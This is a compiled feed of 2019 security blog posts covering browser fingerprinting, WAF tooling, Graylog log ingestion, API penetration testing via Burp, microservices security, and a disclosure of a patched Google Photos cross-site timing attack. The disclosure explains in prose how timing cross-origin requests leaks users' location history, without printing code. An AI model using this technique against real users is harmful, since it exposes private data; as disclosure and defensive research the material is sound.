via Martin Brinkmann, writing as he does on, details a specific attribute to be included in the upcoming Firefox 67 release (slated for May 14th, 2019 (the date provided is somewhat 'fluid', as delays may require a reset on the claimed release date). At any rate, the specific release wil include anti-fingerprinting technology.

"Fingerprinting refers to using data provided by the browser, e.g. automatically or by running certain scripts, to profile users. One of the appeals that fingerprinting has is that it does not require access to local storage and that some techniques work across browsers." - via Martin Brinkmann, writing on his


5 Ways To Demystify Zero Trust Security

Instead of only relying on security vendors’ claims about Zero Trust, benchmark them on a series of five critical success factors instead, with customer results being key. Analytics dashboards dominated

The post 5 Ways To Demystify Zero Trust Security appeared first on The Cyber Security Place.

Big tech poised to beat healthcare in reaping value from artificial intelligence, report says

Artificial intelligence will expose inefficiencies, improve medical decision-making and increase the quality of care, according to a new report from Boston Consulting Group. But the report also warned that companies

The post Big tech poised to beat healthcare in reaping value from artificial intelligence, report says appeared first on The Cyber Security Place.

Enterprises fear disruption to business critical applications, yet don’t prioritize securing them

The majority of organizations (nearly 70 percent) do not prioritize the protection of the applications that their business depend on – such as ERP and CRM systems – any differently than how low-value data, applications or services are secured. Even the slightest downtime affecting business critical applications would be massively disruptive, with 61 percent agreeing that the impact would be severe, according to the CyberArk survey conducted among 1,450 business and IT decision makers, primarily … More

The post Enterprises fear disruption to business critical applications, yet don’t prioritize securing them appeared first on Help Net Security.

Enhance Imperva Cloud WAF with a New Management Tool in the Imperva GitHub

Imperva recently launched the Imperva GitHub where our global community can access tools, code repositories and other neat resources that aid collaboration and streamline development.

The nice thing about these tools is that you can clone them and customize them with whatever functionality you need. If you are nice you can also push new capabilities and even bug fixes  — we are not perfect 🙂 — back into the repository, so other Imperva users can benefit.

In this blog I will present the site-protection-viewer. It allows you to manage your Cloud WAF (formerly Incapsula) account by providing a summary of your web sites’ protection states, and also validates that your origin servers are protected (by restricting non-Imperva traffic). These capabilities are currently not available out of the box in Cloud WAF.

Usage is very simple: set your API_ID and API_KEY in the settings file and run a command in the Command Line. The output is 2 files (html and csv) that provide your site configurations and the state of the origin servers.

This tool is written in nodejs and uses the nodejs capabilities of running requests in parallel in order to shorten the processing time. It uses the Incapsula API which provides access to the account information.

Running the Tool is very Simple

Account Protection Example (html format)

You can see that origin servers are checked using http: and https: protocols. The Summary table can also be saved to a csv file depending on the settings (default is save).

Full Details (html format)

This section is added to the above if the showFullDetails flag is set to True in the settings file. The full details show the actual values that are returned by the Incapsula API for the specific site.

Why is it important to restrict traffic from non-Imperva networks?

Well, it is quite simple. Consider the following analogy. You have a house with a main door. Since you want to protect your house, you post a highly-trained guard at this door in order to grant entry to allowed personnel only. However, there is a catch! Your house has a small backdoor that is unlocked with no guard. Although you have invested a substantial amount of effort at the front door, an unauthorized person can still enter without being noticed and potentially wreak havoc in your house.

The same goes with the origin server IP addresses. You are well protected by Imperva on your main entry to the public internet via the DNS. However, if you don’t restrict (lock) your origin server from receiving direct traffic from the public internet, you are exposed to all the bad stuff you are paying to be protected from.

How to install the site protection viewer

Step 1: Install nodejs.

Step 2: Download the project files from the site-protection-viewer github repository and save them locally in a directory of your choice (aka project directory).

Step 3: In the project directory, open a command prompt and run ‘npm install’.

Step 4: Configure the relevant parameters in the settings.js file.

Step 5: In the project directory run command: ‘node spv’.

Output files can be found in the configured directory.


site-protection-viewer provides you with a summary of the web sites protection states managed by Cloud WAF. Simply download the tool, configure a couple of settings, and run a command. If you want, you use the code of this tool to develop custom-made tools that you can contribute back to the community.

If you want some more neat stuff to help you manage your account, check out the account-level-dashboard tool which provides a graphic dashboard of some of your Cloud WAF account settings.

The post Enhance Imperva Cloud WAF with a New Management Tool in the Imperva GitHub appeared first on Blog.

The Five Most Startling Statistics from this 2019 Global Survey of 1,200 Cybersecurity Pros [Infographic]

For those of us in the security industry, the annual Cyberthreat Defense Report is a gold mine of insights into the minds of IT security professionals, including what threats keep them up at night, and how they plan to defend against them.

The 6th edition of the report from the CyberEdge Group was just published.

I was able to get a sneak peek at the 2019 report. At 43 pages, it is comprehensive without being over-long. It’s also chock-full of useful charts and graphics depicting the results of the survey, which included 1,200 IT security decision makers and practitioners from around the globe from 19 different industries.

There’s no shortage of interesting findings. Here are some of the ones that jumped out at me:

  1. No organization is immune from attack. 2018 was the first in which the percentage of organizations hit by one or more successful cyberattacks actually fell year-over-year. That decrease was short-lived. The percentage of organizations breached in the past year increased again year-over-year to 78% in the 2019 survey. Worse, 32% of businesses reported being breached 6+ times in the last 12 months, up from 27% in the past year. That’s a nearly 20% increase — HUGE in my mind.
  2. The two most-wanted security technologies revolve around smarter software. Security teams are swamped with too much data, not enough intelligence; too many meaningless events, not enough ability to detect the true threats. No wonder that advanced security analytics and threat intelligence services are at the top the list of the most-desired technologies by security professionals.
  3. Web Application Firewalls (WAFs) rule. For the 2nd year in a row, respondents to the CyberEdge survey said WAFs (63%) were their most widely-deployed application and data security technology. That doesn’t surprise us at Imperva, where we take pride in the ability of our WAF — named a Leader by Gartner five years in a row — and app security solutions to prevent DDoS attacks, data breaches, and more. We also take pride in their flexibility, enabling enterprises to deploy them on-premises, in AWS and Azure, or as a cloud service.  
  4. The two security processes businesses struggle with most. They are 1) secure application development and testing, and 2) detection of insider attacks. Because as powerful as WAFs are, they are best at protecting the metaphorical walls of your business from outside attack, but not as optimized for either emerging threats or attacks involving trusted employees who have been compromised or are malicious. Data Security and RASP (Runtime Application Self-Protection) solutions can fill in these security gaps. Subscribers to Imperva’s FlexProtect plans enjoy the ability to quickly deploy such solutions and/or move them between servers and cloud instances as needed.
  5. Machine learning and AI are making an impact TODAY. Who says AI is a coming technology? Four out of five respondents said they believe machine learning and AI are making a difference in the battle to detect cyberthreats. How? By analyzing and automating the processing of millions of security events, filtering out meaningless ones, and distilling the rest into several actionable insights that security pros can quickly act on. That of course is just what our Imperva data risk analytics and attack analytics help provide.

Below is an infographic depicting some other headline findings:

2019 CyberThreat Defense Report infographic on cybersecurity

Learn more by getting your complimentary copy of the CyberEdge Cyberthreat Defense Report. Download here.

And sign up for our webinar on April 10, 8 am PT, where Imperva senior product marketing manager Sara Pan will discuss the findings with Mark Bouchard, COO of the CyberEdge Group.

The post The Five Most Startling Statistics from this 2019 Global Survey of 1,200 Cybersecurity Pros [Infographic] appeared first on Blog.

How to Lift the Veil on Mobile Application Security Threats

Mobile applications have revolutionized the way we consume information. Nowadays, most organizations leverage these powerful tools to enhance their employees’ agility with services that are available 24/7. But granting applications access to highly sensitive corporate data also widens the mobile attack surface, which is why it’s crucial to not overlook the associated application security threats.

Mobile Apps Complicate the Data Privacy Picture

A mobile application is like an iceberg; most of its behaviors are executed silently. On one hand, it can be inherently malicious and feature malware that, when hosted on a device, targets the user’s data, credentials, transactions and more. These behaviors are mostly found in applications available on third-party stores, but sometimes also in major commercial app stores. In 2019, Pradeo Lab discovered that 5 percent of Android and 2 percent of iOS apps hosted malicious programs.

On the other hand, a mobile application doesn’t need to be malicious to hurt collaborators’ privacy. Greyware is a category of application that comprises intrusive apps that exfiltrate user data to the network (67 percent of Android apps and 61 percent of iOS apps) as well as vulnerable apps developed without following security best practices (61 percent of Android apps).

Either way, mobile apps have the power to severely compromise corporate data privacy. Today, security heads are stuck with the major challenge of complying with data privacy laws and enhancing user productivity while preserving their agility.

Shed Light on Mobile Application Security Threats in Your Network

Organizations that distribute mobile apps are encouraged — and required by law in some industries — to diagnose their security levels prior to release. To shed light on all aspects of a mobile app, it is necessary to audit it with a mobile application security testing (MAST) tool. MAST solutions perform multidimensional analyses (static and dynamic) that allow security teams to detect all app behaviors and vulnerabilities. This way, organizations can ensure that the apps they are about to release do not threaten the privacy of any corporate or personal data. If they do, this process will help the relevant parties repackage them.

MAST solutions are available as software-as-a-service (SaaS) and sometimes as an application programming interface (API) to integrate within developers’ environments. In addition, some unified endpoint management (UEM) solutions are starting to integrate this kind of service within their platform to facilitate security heads’ experience.

Register for the webinar to learn more

The post How to Lift the Veil on Mobile Application Security Threats appeared first on Security Intelligence.

Less than 20% of IT pros have complete access to critical data in public clouds

Companies have low visibility into their public cloud environments, and the tools and data supplied by cloud providers are insufficient. Lack of visibility can result in a variety of problems including the inability to track or diagnose application performance issues, inability to monitor and deliver against service-level agreements, and delays in detecting and resolving security vulnerabilities and exploits. A survey sponsored by Ixia, on ‘The State of Cloud Monitoring’, was conducted by Dimensional Research and … More

The post Less than 20% of IT pros have complete access to critical data in public clouds appeared first on Help Net Security.

The privacy risks of pre-installed software on Android devices

Many pre-installed apps facilitate access to privileged data and resources, without the average user being aware of their presence or being able to uninstall them. On the one hand, the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information. At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of … More

The post The privacy risks of pre-installed software on Android devices appeared first on Help Net Security.

Imperva Cloud WAF and Graylog, Part II: How to Collect and Ingest SIEM Logs

This guide gives step-by-step guidance on how to collect and parse Imperva Cloud Web Application Firewall (WAF, formerly Incapsula) logs into the Graylog SIEM tool. Read Part I to learn how to set up a Graylog server in AWS and integrate with Imperva Cloud WAF.

This guide assumes:

  • You have a clean Graylog server up and running, as described in my earlier blog article
  • You are pushing (or pulling) the Cloud WAF SIEM logs into a folder within the Graylog server
  • You are not collecting the logs yet

Important! The steps below apply for the following scenario:

  • Deployment as a stand-alone EC2 in AWS
  • Single-server setup, with the logs located on the same server as Graylog
  • The logs are pushed to the server uncompressed and unencrypted

Although this blog was created for a deployment on AWS, most of the steps below apply. Other setups (other clouds, on-premises) will require a few networking changes from the guide below.

This article will detail all the steps to configure the log collector and parser in few major steps:

  • Step 1: Install the sidecar collector package for Graylog
  • Step 2: Configure a new log collector in Graylog
  • Step 3: Creating a log Input & extractor with Incapsula content pack for Graylog (the json with the parsing rules)

Step 1: Install the Sidecar Collector Package

  1. Install the Graylog sidecar collector

Let’s first download the appropriate package. Identify the right sidecar collector package suited for our deployment in Github:

Since we are deploying Graylog 2.5.x, the corresponding sidecar collector version is 0.1.x.

Go ahead and install the relevant package.

We are running a 64bits server and .deb work best with Debian/Ubuntu machines.

Run the following commands:

  1. cd /tmp   #or any directory you would like to use

Download the right package:

2. curl -L -O

  1. Install the package:

sudo dpkg -i collector-sidecar_0.1.7-1_amd64.deb  

2. Configure sidecar collector

cd /etc/graylog/collector-sidecar

sudo nano collector_sidecar.yml

Now let’s change the server URL to the local server IP (local IP, not AWS public IP). And let’s add incapsula-logs to the tags:

And let’s install and start graylog-collector-sidecar service with the following commands:

sudo graylog-collector-sidecar -service installsudo systemctl start collector-sidecar 

Step 2: Configure a New Log Collector in Graylog

3. Add a collector in Graylog

Follow the steps below to add a collector:

  • System > Collectors
  • Click Manage Configurations
  • Then click Create configuration

Let’s name it and then click on the newly-created collector:

4. Add Incapsula-logs as a tag

5. Configure the Output and then the Input of the collectors

Click on Create Output and configure the collector as below:

Now click on Create Input and configure the collector as below:

Step 3: Creating Log Inputs and Extractors with Incapsula (now named Imperva Cloud Web Application Firewall) Content Pack for Graylog

6. Let’s now launch a new Input as below:

And configure the Beats collector inputs as required:

The TLS details are not mandatory at this stage as we will work with unencrypted SIEM logs for this blog.

7. Download the Incapsula SIEM package for Graylog in Github

Reach the following link.

Retrieve the json configuration of the package. It includes all the Imperva Cloud Web Application Firewall (formerly Incapsula) parsing rules of event fields which will allows an easy import within Graylog along with clear naming.

Extract the content_pack.json file and import it as an extractor in Graylog.

Go to System/ Content packs and import the json file you just downloaded:

The content pack will use our legacy name and we can now apply the new content pack as below:

The new content pack will be displayed in Graylog System / Input menu from which you can extract its content by clicking “Manage extractors”:

And you can now import it in our predefined extractors  to the input we previously configured.

Paste the content of Incapsula content pack extractor:

If all works as expected, you should get the confirmation as below:

You should now see that the headers that will be parsed by Graylog have been successfully imported and will have appropriate naming as can be seen in a screenshot below:

Field extractors for Incapsula (or Imperva Cloud WAF) events in Graylog SIEM:

8. Restart the sidecar collector service

Once all is configured you can restart the sidecar service with the following command in the server command line:

sudo systemctl restart collector-sidecar

We can also enforce sidecar collector to run at the server startup:

sudo systemctl enable collector-sidecar 

Let’s check that the collector is active and the service is properly running:

The collector service should now appear as active in Graylog:

9. Check that you see messages and logs

Click on the Search bar. After a few minutes you should start to see the logs displayed.

Give it 10-15 minutes before troubleshooting if you don’t see messages displayed immediately.

You can see on the left panel that the filters and retrieved headers are in line with Imperva. Client_IP are retrieved from the Incap-Client-IP and are the real client IPs, Client App are the client classification detected by Imperva Cloud WAF etc…

The various headers are explained in the following headers that you can see:

10. Congratulations!

Congratulations, we are now successfully exporting, collecting and parsing Imperva Cloud WAF/Incapsula SIEM logs!

In the next article, we will review the imported Imperva Cloud WAF dashboard template.

If you have suggestions for improvements or updates in any of the steps, please share with the community in the comments below.

The post Imperva Cloud WAF and Graylog, Part II: How to Collect and Ingest SIEM Logs appeared first on Blog.

Better API Penetration Testing with Postman – Part 2

In Part 1 of this series, I walked through an introduction to Postman, a popular tool for API developers that makes it easier to test API calls. We created a collection, and added a request to it. We also talked about how Postman handles cookies – which is essentially the same way a browser does. In this part, we’ll tailor it a bit more toward penetration testing, by proxying Postman through Burp. And in the upcoming parts 3 and 4, we’ll deal with more advanced usage of Postman, and using Burp Extensions to augment Postman, respectively.

Why proxy?

By using Postman, we have its benefits as a superior tool for crafting requests from scratch, and managing them. By proxying it through Burp, we gain its benefits: we can fuzz with intruder, we have the passive scanner highlighting issues for us, we can leverage Burp extensions as we will see in Part 4 of this series. And we can use Repeater for request tampering. Yes, it’s true that we could do our tampering in Postman. There are two strong reasons to use Repeater for it: 1) Postman is designed to issue correct, valid requests. Under some circumstances, it will try to correct malformed syntax. When testing for security issues, we may not want it trying to correct us. 2) By using Repeater, we maintain a healthy separation between our clean-state request in Postman, and our tampered requests in Repeater.

Setting up Burp Suite

An actual introduction to burp is outside the scope of this particular post. If you’re reading this, it’s likely you’re already familiar with it – we aren’t doing anything exotic or different for API testing.
If you’re unfamiliar with it, here are some resources:

Now, launch Burp, check the Proxy -> Options tab.
The top section is Proxy Listeners, and you should see a listener on, port 8080. It must be Running (note the checkbox). If it’s not running by default, that typically means the port is not available, and you will want to change the listener (and Postman) to a different port. As long as Burp is listening on the same port Postman is trying to proxy through, your setup should work.

Also check the Proxy -> Intercept tab and verify that Intercept is off.

Configuring Postman to Proxy through Burp

Postman is proxy-aware, which means we want to point it at our man-in-the-middle-proxy, which is Burp Suite (my tool of choice) for this post. We’ll open the Settings dialog by clicking the Wrench icon in the top-right (1) and then Settings option on its drop-down menu (2).
This will open a large Settings dialog with tabs across the top for the different categories of settings. Locate the Proxy tab and click it to navigate.

Opening the Postman Settings pane

There are 3 things to do on this tab:

  1. Turn On the Global Proxy Configuration switch.
  2. Turn Off the Use System Proxy switch.
  3. Set the Proxy Server IP address and port to match your Burp Suite proxy interface.
Proxy Settings Tab – Pointing Postman at your Burp Suite listener

The default proxy interface will be, port 8080 assuming you are running Burp Suite on the same machine as Postman. If you want to use a different port, you will need to specify it here and make sure it’s set to match the proxy interface in Burp.

Now that you are able to proxy traffic, there’s one more hurdle to consider. Today, SSL/TLS is used on most public APIs. This is a very good thing, but it means when Burp man-in-the-middles the Postman’s API requests and responses, you will get certificate errors unless your Burp Certificate Authority is trusted by your system. There are two options to fix this:

  1. You can turn off certificate validation in Postman. Under the General settings tab, there’s an SSL certification verification option. Setting it to Off will make Postman ignore any certificate issues, including the fact that your Burp Suite instance’s PortSwigger CA is untrusted.
  2. You can trust your Burp Suite CA to your system trust store. The specifics of how to do this are platform specific.
    PortSwigger’s documentation for it is here:

Verify that it is working

Issue some requests in Postman. Check your HTTP History on the Proxy tab in Burp.

Proxy history in Burp Suite


  • Your request is stalling and timing out? Verify that Intercept is Off on the Proxy tab in Burp. Check that your proxy settings in Postman match the Proxy Interface in Burp.
  • Postman is getting responses but they aren’t showing in the Proxy History (etc) in Burp? Check the Settings in Postman to verify that Global Proxy Config is turned on. Make sure you haven’t activated a filter on the History in Burp that would filter out all of your requests. Also make sure your scope is set, if you’re not capturing out-of-scope traffic.

Next Steps

So this was two posts of pretty elementary setup type activity. Now that we have our basic tool-chain setup, we’re ready for some more advanced stuff. Part 3 will deal with variables in Postman, and how they can simplify your life. It will also dig into the scripting interface, and how to use it to simplify interactions with more common, modern approaches to Auth, such as Bearer tokens.

Securing the Microservices Architecture: Decomposing the Monolith Without Compromising Information Security

In the world of software development, microservices is a variant of service-oriented architecture (SOA). It is an architectural style in which software applications that are typically built as monoliths and run in a single process are decomposed into smaller parts. Each of these parts is called a microservice, running independently with its own process.

Creating a mental picture of monolith versus microservices is relatively easy:

Securing the Microservices Infrastructure

Microservices is a great way to redefine large-scale software projects because it is more flexible and allows for on-demand scalability and much shorter release cycles. As a result, forward-thinking organizations have been increasingly moving to the microservices development style. With this architecture’s fine-grained services and lightweight protocols, it can help teams increase product modularity, making applications easier to develop, test, deploy, modify and maintain over time.

Microservices is also good for scalability. If teams want to scale up one component, they can do that without having to scale the entire project. Scaling up can therefore be a lot faster and less costly.

It might sound like microservices is a cure-all for software development woes. But like any other domain, it has its disadvantages; moving to microservices adds complexity and security implications. Regardless of how an application is designed, major gaps could potentially be introduced on the platform level. In microservices, security concerns can get exacerbated due to the various network connections and application programming interfaces (APIs) used to forge communication channels between the components of the microservice architecture. Another issue is that, if not properly designed, the standardized replicable nature of containers could spread out any vulnerability manyfold.

From managing user access to the code all the way to implementing a distributed firewall, one thing is clear: Ditching monolith for microservices may be right for your organization, but the relevant security considerations must be addressed early in the process.

The Microservices Trinity: Cloud, Containers and DevOps

Microservices are containerized and accessed on scale via cloud infrastructures. To make microservices flow effectively, organizations must adopt a DevOps culture where small, multidisciplinary teams work autonomously, applying Agile methodologies and including operations in their scope of responsibility.

This combination of factors can increase overall security risk for the organization in general and, more specifically, through the phases of a microservice-based application project: planning, development and post-deployment operations in cloud-hosted architectures.

Key Concerns: Knowing Where to Look First

In general, organizations nowadays are aware of their overall risk appetite and know that new projects always introduce new risk considerations. With a move to microservices, we are looking at a gradual process that breaks one large, monolithic project into smaller parts, each of which needs to be managed as its own project. Below are a few key concerns to look out for when operating a microservices architecture.


Isolation is at the core of the microservices concept. To be an autonomous piece of the overall application puzzle, a microservice needs to be its own island in a sense — architected, created, deployed, maintained, modified, scaled and, eventually, retired without affecting any of the other microservices around it.

One area where isolation is much-needed is on the database level. Monolithic applications where every part of the application can access any part of the databases can, over time, impact performance due to deadlocks, row locks and errors. Microservices, in contrast, can avoid that if isolation is applied — for example, if it is decided that only one microservice will access one data store and integration with the entire database is eliminated. In a security sense, that means more microservices and more data stores to secure. But if done correctly, one microservice will not be able to access the data of another and, if compromised, it will not give way to an attacker moving laterally.

Another area that requires isolation is deployment. The goal is to ensure that each microservice is deployed without impacting others around it and, should it fail, that the effect would not bring down other microservices as well. The biggest challenge typically applies to multitenant applications, which require isolation on both the microservices and data levels, such as in software-as-a-service (SaaS) scenarios.

A Preference for Hybrid Clouds

Developing at scale usually takes place in the cloud, and most organizations have been doing it for years now. That can also mean that any given organization operates different parts of its infrastructure of different clouds with different vendors. Securing microservices will therefore have to be cloud-agnostic and applicable to any environment with relevant controls in place to achieve uniform effectivity across the various cloud infrastructures.

Insecure DevOps Tool Sets

There are some great open-source tool sets out there built for DevOps teams, and they can be used in most Agile developments. What these tools may not always offer is proper security. Integrating open-source tools into the team’s projects requires assessing exposure and adapting controls ahead of integration, as well as reevaluating them over time. Open-source also means access for all, and that often gives way to opportunities for attackers to plant or exploit vulnerabilities and infect tools with malicious code.

Interservice Communications

Interservice communication is typically not a good idea for projects that exist autonomously, but in some cases it is necessary. These channels can be risky and costly if not designed and implemented properly. Securing interservice communications calls for high standards and encryption on the data level where needed.

Managing Data Layers

Each microservice manages its own data. As a result, data integrity and consistency become critical security challenges to reckon with. This is partly because of the intricacy in planning data stores to keep entries once in each store, avoiding redundancy. One store can keep a reference to a piece of data stored elsewhere, but it should not be duplicated across many stores. From a security viewpoint, we are looking at the CIA triad of confidentiality, integrity, availability — all of which must be managed correctly to provide the organization with better levels of performance and continuity than it had in its monolithic days.

Dive Into Microservice Security

Microservice architectures bring agility, scalability and consistency to the development platform. However, security in these environments often lags behind.

A major concern we face in that domain is imposing the right level of isolation based on application type, platform and data in context. We also look at privacy, regulatory concerns and possible security automation to incubate within the DevOps life cycle.

Though DevOps has already made some strides toward integrating security into the development life cycle, there’s still significant work to be done in this space.

Want to learn more? Check out our paper, “Securing Microservice Architectures — A Holistic Approach.”

The post Securing the Microservices Architecture: Decomposing the Monolith Without Compromising Information Security appeared first on Security Intelligence.

Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed malicious websites to expose where, when, and with whom your photos were taken.

A now-patched vulnerability in the web version of Google Photos allowed  malicious websites to expose where, when, and with whom your photos were taken.


One trillion photos were taken in 2018. With image quality and file size increasing, it’s obvious why more and more people choose to host their photos on services like iCloud, Dropbox and Google Photos.

One of the best features of Google Photos is its search engine. Google Photos automatically tags all your photos using each picture’s metadata (geographic coordinates, date, etc.) and a state-of-the-art AI engine, capable of describing photos with text, and detecting objects and events such as weddings, waterfalls, sunsets and many others. If that’s not enough, facial recognition is also used to automatically tag people in photos. You could then use all this information in your search query just by writing “Photos of me and Tanya from Paris 2018”.

The Threat

I’ve used Google Photos for a few years now, but only recently learned about its search capabilities, which prompted me to check for side-channel attacks. After some trial and error, I found that the Google Photos search endpoint is vulnerable to a browser-based timing attack called Cross-Site Search (XS-Search).

In my proof of concept, I used the HTML link tag to create multiple cross-origin requests to the Google Photos search endpoint. Using JavaScript, I then measured the amount of time it took for the onload event to trigger. I used this information to calculate the baseline time — in this case, timing a search query that I know will return zero results.

Next, I timed the following query “photos of me from Iceland” and compared the result to the baseline. If the search time took longer than the baseline, I could assume the query returned results and thus infer that the current user visited Iceland.

As I mentioned above, the Google Photos search engine takes into account the photo metadata. So by adding a date to the search query, I could check if the photo was taken in a specific time range. By repeating this process with different time ranges, I could quickly approximate the time of the visit to a specific place or country.

Attack Flow

The video below demonstrates how a 3rd-party site can use time measurements to extract the names of the countries you took photos in. The first bar in the video named “controlled” represents the baseline of an empty results page timing. Any time measurement above the  baseline indicates a non-empty result timing, i.e., the current user has visited the queried country.

For this attack to work, we need to trick a user into opening a malicious website while logged into Google Photos. This can be done by sending a victim a direct message on a popular messaging service or email, or by embedding malicious Javascript inside a web ad. The JavaScript code will silently generate requests to the Google Photos search endpoint, extracting Boolean answers to any query the attacker wants.

This process can be incremental, as the attacker can keep track of what has already been asked and continue from there the next time you visit one of his malicious websites.

You can see below the timing function I implemented for my proof of concept:

Below is the code I used to demonstrate how users’ location history can be extracted.

Closing Thoughts

As I said in my previous blog post, it is my opinion that browser-based side-channel attacks are still overlooked. While big players like Google and Facebook are catching up, most of the industry is still unaware.

I recently joined an effort to document those attacks and vulnerable DOM APIs. You can find more information on the xsleaks repository (currently still under construction).

As a researcher, it was a privilege to contribute to protecting the privacy of the Google Photos user community, as we continuously do for our own Imperva customers.


Imperva is hosting a live webinar with Forrester Research on Wednesday March 27 1 PM PT on the topic, “Five Best Practices for Application Defense in Depth.” Join Terry Ray, Imperva SVP and Imperva Fellow, Kunal Anand, Imperva CTO, and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy bolstered by real-time visibility to help security analysts distinguish real threats from noise can provide true protection for enterprises. Sign up to watch and ask questions live or see the recording!

The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

Creating Meaningful Diversity of Thought in the Cybersecurity Workforce

The other day, I learned something that great French winemakers have known for centuries: It is often difficult to make a complex wine from just one variety of grape. It is easier to blend the juice from several grapes to achieve the structure and nuance necessary to truly delight the palate.

We are similarly relearning that building diversity into the cybersecurity workforce allows us to more easily tackle a wider range of problems and get to better, faster solutions.

Essential New Facets of Diversity

I don’t want to strain the metaphor too much, but we can certainly learn from our winemaking friends. Just as they search for juice with attributes such as structure, fruitiness and acidity, we search for ways to add the personal attributes that will be accretive to the problem-solving prowess and design genius of our teams. One of my personal quests has been to add the right mix of business skills to the technical teams I have had the honor to lead.

On my personal best practice adoption tour, I have made many familiar stops. I learned and then taught Philip Crosby’s Total Quality Management system and fretted about our company’s whole-product marketing mastery in the ’90s (thank you, Geoffrey Moore, author of “Crossing the Chasm”). Over the last 15 years, I implemented ITIL, lean principles and agile development (see the “Manifesto for Agile Software Development”), applied core and context thinking (“Dealing with Darwin”) to help my teams establish skill set development plans, and used horizon planning (introduced in “The Alchemy of Growth” by Baghai, Coley and White) to assign budget.

Throughout this journey, I kept trying to add the best practices that were intended for development, manufacturing and marketing to the mix. I was just not content to “stay in my lane.” I did this because I believe that speaking the language of development, manufacturing and marketing — aka the language of business — is essential for technology and security.

Innovation and the Language of Business

As a security evangelist, I have long advocated that chief information security officers (CISOs) must learn how to be relevant to the business and fluent in the language of business. A side benefit I did not fully explore at the time was how much the diversity of thought helped me in problem-solving.

We have been discovering the value of diversity of thought through programs such as IBM’s new collar initiative and the San Diego Cyber Center of Excellence (CCOE)’s Internship and Apprenticeship Programs. IBM’s initiative and the CCOE’s program rethink recruiting to pull workers into cybersecurity from adjacent disciplines, not just adjacent fields.

Toward the end of my stay at Intuit, I participated in a pilot program that brought innovation catalyst training to leaders outside of product development. Innovation catalysts teach the use of design thinking to deliver what the customer truly wants in a product. While learning the techniques I would later use to coach my teams and tease out well-designed services — services that would delight our internal customers — I was struck by an observation: People of different job disciplines didn’t just solve problems in different ways, they brought different values and valued different outcomes.

So, another form of diversity we should not leave out is the diversity of values derived from different work histories and job functions. We know that elegant, delightful systems that are socially and culturally relevant, and that respect our time, our training and the job we are trying to do, will have a higher adoption rate. We struggle with how to develop these systems with built-in security because we know that bolted-on security has too many seams to ever be secure.

To achieve built-in security, we’ve tried to embed security people in development and DevOps processes, but we quickly run out of security people. We try to supplement with security-minded employees, advocates and evangelists, but no matter how many people we throw at the problem, we are all like Sisyphus, trying to push an ever-bigger rock up an ever-bigger hill.

The Value of Inherently Secure Products

The problem, I think, is that we have not learned how to effectively incorporate the personal value and social value of inherently secure products. We think “make it secure too” instead of “make it secure first.” When I think about the design teams I’ve worked with as I was taking the catalyst training, the very first focus was on deep customer empathy — ultimate empathy for the job the customer is trying to do with our product or service.

People want the products they use to be secure; they expect it, they demand it. But we make it so difficult for them to act securely, and they become helpless. Helpless people do not feel empowered to act safely, they become resigned to being hacked, impersonated or robbed.

The kind of thinking I am advocating for — deep empathy for the users of the products and services we sell and deploy — has led to what I believe, and studies such as IBM’s “Future of Identity Study” bear out, is the imminent elimination of the password. No matter how hard we try, we are not going to get significantly better password management. Managing 100-plus passwords will never be easy. Not having a password is easy, at least for the customer.

We have to create a new ecosystem for authentication, including approaches such as the intelligent authentication that IAmI provides. Creating this new ecosystem gives us an opportunity to delight the customer. Writing rules about what kinds of passwords one can use and creating policies to enforce the rules only delights auditors and regulators. I won’t say we lack the empathy gene, but our empathy is clearly misplaced.

Variety Is the Spice of the Cybersecurity Workforce

As we strive to create products and services that are inherently secure — aka secure by design — let’s add the diversity of approach, diversity of values and advocacy for deep customer empathy to the cybersecurity workforce diversity we are building. Coming back to my recent learning experience, I much prefer wines that were crafted by selecting grape attributes that delight the palate over ones that were easy to farm.

The post Creating Meaningful Diversity of Thought in the Cybersecurity Workforce appeared first on Security Intelligence.

How the Google and Facebook outages could impact application security

With major outages impacting Gmail, YouTube, Facebook and Instagram recently, consumers are right to be concerned over the security of their private data. While details of these outages haven’t yet been published – a situation I sincerely hope Alphabet and Facebook correct – the implications of these outages are something we should be looking closely at. The first, and most obvious, implication is the impact of data management during outages. Software developers tend to design … More

The post How the Google and Facebook outages could impact application security appeared first on Help Net Security.

Radware Blog: Bots 101: This is Why We Can’t Have Nice Things

In our industry, the term bot applies to software applications designed to perform an automated task at a high rate of speed. Typically, I use bots at Radware to aggregate data for intelligence feeds or to automate a repetitive task. I also spend a vast majority of time researching and tracking emerging bots that were […]

The post Bots 101: This is Why We Can’t Have Nice Things appeared first on Radware Blog.

Radware Blog

Don’t Be Trapped – Close Cybersecurity Holes

Take a glance at the most discussed cybersecurity news of the week. Learn about the current cybersecurity holes in business applications and how to avoid them. The air is filled with

The post Don’t Be Trapped – Close Cybersecurity Holes appeared first on The Cyber Security Place.

Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, security efforts are often seen as red, as in a red stop light or stop sign. In others, they are seen as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

